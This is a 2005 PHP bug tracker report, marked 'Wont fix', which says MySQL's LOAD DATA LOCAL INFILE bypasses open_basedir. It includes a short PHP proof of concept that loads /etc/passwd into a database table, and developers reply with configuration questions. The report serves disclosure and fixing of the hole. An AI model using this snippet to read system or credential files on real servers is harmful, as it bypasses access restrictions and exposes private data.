PHP :: Bug #31711 :: LOAD DATA LOCAL is still not respecting Open

Bug #31711

LOAD DATA LOCAL is still not respecting Open_BaseDir

Submitted:

2005-01-26 23:57 UTC

Modified:

2005-02-01 19:01 UTC

Votes:	10
Avg. Score:	4.8 ± 0.4
Reproduced:	10 of 10 (100.0%)
Same Version:	8 (80.0%)
Same OS:	7 (70.0%)

From:

tim at zielosko dot net

Assigned:

Status:

Wont fix

Package:

MySQL related

PHP Version:

4.3.10

OS:

GNU/Debian

Private report:

CVE-ID:

None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	tim at zielosko dot net
New email:
PHP Version:		OS:

New Comment:

[2005-01-26 23:57 UTC] tim at zielosko dot net

Description:
------------
As already mentioned in PHP Bugs Bug #28632 and Bug #23779, mysqllib still isn't respecting open_basedir. So opening of any files in the local filesystem is possible.

Normally, this should have been fixed in PHP 4.3.8, but the exploit still works.

Reproduce code:
---------------
<?php

$ressource = mysql_connect('host', 'user', 'password');
$db_selected = mysql_select_db('db', $ressource);
$result = mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE
passwd");
if (!$result) die('MySQL Error: ' . mysql_error());
mysql_close($ressource);

?>

Expected result:
----------------
Access denied error or command not allowed.

Actual result:
--------------
The file /etc/passwd will be inserted into the table passwd.

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2005-01-29 21:12 UTC] iliaa@php.net

Are you using the built-in MySQL library.

[2005-02-01 17:52 UTC] tim at zielosko dot net

I'm using php4-mysql (4:4.3.10-2) from Debian Sarge, so it should be the built-in library.

[2005-02-01 18:55 UTC] sniper@php.net

What is your open_basedir set as?

[2005-02-01 18:57 UTC] sniper@php.net

Also, what is sql.safe_mode set to?

[2005-02-01 19:01 UTC] sniper@php.net

See bug #21356

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Sun Dec 22 01:01:30 2024 UTC